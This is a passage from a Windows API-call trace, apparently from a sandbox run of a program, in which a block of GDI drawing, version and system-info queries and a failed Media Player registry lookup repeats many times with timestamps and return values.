lpPaint=0x1817cc) returned 0x0 [0017.623] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.623] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.623] BeginPath (hdc=0x0) returned 0 [0017.623] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.623] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.623] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.623] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.623] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.623] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.623] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.623] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.623] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x86040713 [0017.624] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7c04027d [0017.624] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4a [0017.624] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4b [0017.624] CombineRgn (hrgnDst=0x1040b4a, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=1) returned 1 [0017.624] CombineRgn (hrgnDst=0x1040b4b, hrgnSrc1=0x86040713, hrgnSrc2=0x7c04027d, iMode=4) returned 2 [0017.624] CreateSolidBrush (color=0xff) returned 0x2100b49 [0017.624] CreateSolidBrush (color=0xff0000) returned 0x1100b4c [0017.624] DeleteObject (ho=0x1100b4c) returned 1 [0017.624] DeleteObject (ho=0x7c04027d) returned 1 [0017.624] DeleteObject (ho=0x86040713) returned 1 [0017.624] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.624] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.624] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.624] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.624] BeginPath (hdc=0x0) returned 0 [0017.624] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.624] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.624] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.624] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.624] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.624] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.624] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.624] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7d04027d [0017.624] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x87040713 [0017.624] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4d [0017.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4e [0017.625] CombineRgn (hrgnDst=0x1040b4d, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=1) returned 1 [0017.625] CombineRgn (hrgnDst=0x1040b4e, hrgnSrc1=0x7d04027d, hrgnSrc2=0x87040713, iMode=4) returned 2 [0017.625] CreateSolidBrush (color=0xff) returned 0x2100b4c [0017.625] CreateSolidBrush (color=0xff0000) returned 0x1100b4f [0017.625] DeleteObject (ho=0x1100b4f) returned 1 [0017.625] DeleteObject (ho=0x87040713) returned 1 [0017.625] DeleteObject (ho=0x7d04027d) returned 1 [0017.625] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.625] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.625] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.625] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.625] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.625] BeginPath (hdc=0x0) returned 0 [0017.625] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.625] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.625] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.625] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.625] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.625] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.625] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.625] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.625] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x88040713 [0017.625] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e04027d [0017.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b50 [0017.625] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b51 [0017.625] CombineRgn (hrgnDst=0x1040b50, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=1) returned 1 [0017.625] CombineRgn (hrgnDst=0x1040b51, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=4) returned 2 [0017.625] CreateSolidBrush (color=0xff) returned 0x2100b4f [0017.625] CreateSolidBrush (color=0xff0000) returned 0x1100b52 [0017.626] DeleteObject (ho=0x1100b52) returned 1 [0017.626] DeleteObject (ho=0x7e04027d) returned 1 [0017.626] DeleteObject (ho=0x88040713) returned 1 [0017.626] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.626] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.626] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.626] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.626] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.626] BeginPath (hdc=0x0) returned 0 [0017.626] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.626] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.626] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.626] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.626] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.626] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.626] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f04027d [0017.626] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x89040713 [0017.626] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b53 [0017.626] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b54 [0017.626] CombineRgn (hrgnDst=0x1040b53, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=1) returned 1 [0017.626] CombineRgn (hrgnDst=0x1040b54, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=4) returned 2 [0017.626] CreateSolidBrush (color=0xff) returned 0x2100b52 [0017.626] CreateSolidBrush (color=0xff0000) returned 0x1100b55 [0017.626] DeleteObject (ho=0x1100b55) returned 1 [0017.626] DeleteObject (ho=0x89040713) returned 1 [0017.626] DeleteObject (ho=0x7f04027d) returned 1 [0017.626] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.626] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.627] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.627] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.627] BeginPath (hdc=0x0) returned 0 [0017.627] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.627] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.627] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.627] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.627] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.627] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.627] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.627] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a040713 [0017.627] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8004027d [0017.627] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b56 [0017.627] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b57 [0017.627] CombineRgn (hrgnDst=0x1040b56, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=1) returned 1 [0017.627] CombineRgn (hrgnDst=0x1040b57, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=4) returned 2 [0017.627] CreateSolidBrush (color=0xff) returned 0x2100b55 [0017.627] CreateSolidBrush (color=0xff0000) returned 0x1100b58 [0017.627] DeleteObject (ho=0x1100b58) returned 1 [0017.627] DeleteObject (ho=0x8004027d) returned 1 [0017.627] DeleteObject (ho=0x8a040713) returned 1 [0017.627] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.627] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.627] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.627] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.627] BeginPath (hdc=0x0) returned 0 [0017.627] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.628] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.628] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.628] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.628] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8104027d [0017.628] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b040713 [0017.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b59 [0017.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5a [0017.628] CombineRgn (hrgnDst=0x1040b59, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=1) returned 1 [0017.628] CombineRgn (hrgnDst=0x1040b5a, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=4) returned 2 [0017.628] CreateSolidBrush (color=0xff) returned 0x2100b58 [0017.628] CreateSolidBrush (color=0xff0000) returned 0x1100b5b [0017.628] DeleteObject (ho=0x1100b5b) returned 1 [0017.628] DeleteObject (ho=0x8b040713) returned 1 [0017.628] DeleteObject (ho=0x8104027d) returned 1 [0017.628] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.628] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.628] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.628] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.628] BeginPath (hdc=0x0) returned 0 [0017.628] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.628] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.628] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.628] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.629] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c040713 [0017.629] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8204027d [0017.629] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5c [0017.629] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5d [0017.629] CombineRgn (hrgnDst=0x1040b5c, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=1) returned 1 [0017.629] CombineRgn (hrgnDst=0x1040b5d, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=4) returned 2 [0017.629] CreateSolidBrush (color=0xff) returned 0x2100b5b [0017.629] CreateSolidBrush (color=0xff0000) returned 0x1100b5e [0017.629] DeleteObject (ho=0x1100b5e) returned 1 [0017.629] DeleteObject (ho=0x8204027d) returned 1 [0017.629] DeleteObject (ho=0x8c040713) returned 1 [0017.629] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.629] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.629] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.629] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.629] BeginPath (hdc=0x0) returned 0 [0017.629] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.629] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.629] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.629] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.630] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8304027d [0017.630] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d040713 [0017.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5f [0017.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b60 [0017.630] CombineRgn (hrgnDst=0x1040b5f, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=1) returned 1 [0017.630] CombineRgn (hrgnDst=0x1040b60, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=4) returned 2 [0017.630] CreateSolidBrush (color=0xff) returned 0x2100b5e [0017.630] CreateSolidBrush (color=0xff0000) returned 0x1100b61 [0017.630] DeleteObject (ho=0x1100b61) returned 1 [0017.630] DeleteObject (ho=0x8d040713) returned 1 [0017.630] DeleteObject (ho=0x8304027d) returned 1 [0017.630] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.630] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.630] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.630] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.630] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.630] BeginPath (hdc=0x0) returned 0 [0017.630] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.630] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.630] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.630] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.630] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.630] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.630] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.630] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e040713 [0017.630] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8404027d [0017.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b62 [0017.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b63 [0017.630] CombineRgn (hrgnDst=0x1040b62, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=1) returned 1 [0017.631] CombineRgn (hrgnDst=0x1040b63, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=4) returned 2 [0017.631] CreateSolidBrush (color=0xff) returned 0x2100b61 [0017.631] CreateSolidBrush (color=0xff0000) returned 0x1100b64 [0017.631] DeleteObject (ho=0x1100b64) returned 1 [0017.631] DeleteObject (ho=0x8404027d) returned 1 [0017.631] DeleteObject (ho=0x8e040713) returned 1 [0017.631] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.631] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.631] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.631] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.631] BeginPath (hdc=0x0) returned 0 [0017.631] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.631] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.631] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.631] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: 